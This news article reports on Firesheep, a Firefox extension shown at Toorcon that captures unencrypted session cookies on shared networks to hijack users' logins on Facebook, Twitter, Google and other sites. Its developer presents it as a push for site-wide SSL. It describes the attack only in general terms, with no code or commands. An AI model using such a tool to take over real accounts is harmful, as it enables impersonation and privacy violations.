Firefox extension makes social network ID spoofing trivial
A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has hit the security world with the realization that squabbles about Facebook’s changing privacy settings and various privacy breaches simply miss the point.
“When it comes to user privacy, SSL is the elephant in the room,” said Eric Butler, the developer of the extension in question, dubbed Firesheep. By installing and running it, anyone can “sniff out” the unencrypted HTTP sessions currently allowing users on that network segment to access social networks, online services and other website requiring a login, and simply hijack them and impersonate the user.
“As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed,” explains Butler. “Double-click on someone, and you’re instantly logged in as them.”
It is not that this was impossible to do before the advent of Firesheep, but it included the use of some knowledge that average Internet users didn’t have. “Websites have a responsibility to protect the people who depend on their services. They’ve been ignoring this responsibility for too long, and it’s time for everyone to demand a more secure web. My hope is that Firesheep will help the users win,” says Butler.
Whether he will succeed in pointing out the need of full end-to-end encryption and spur websites into action, it remains to be seen. Among the websites whose cookies Firesheep can identify are Facebook, Flickr, Amazon.com, bit.ly, Google, Twitter, Yahoo, WordPress, and many others.
As I write this, the extension has been downloaded some 8,000 times, and the number is rising by the second. Wouldn’t it be amazing that an action such as this could bring about the realization of a more secure Internet?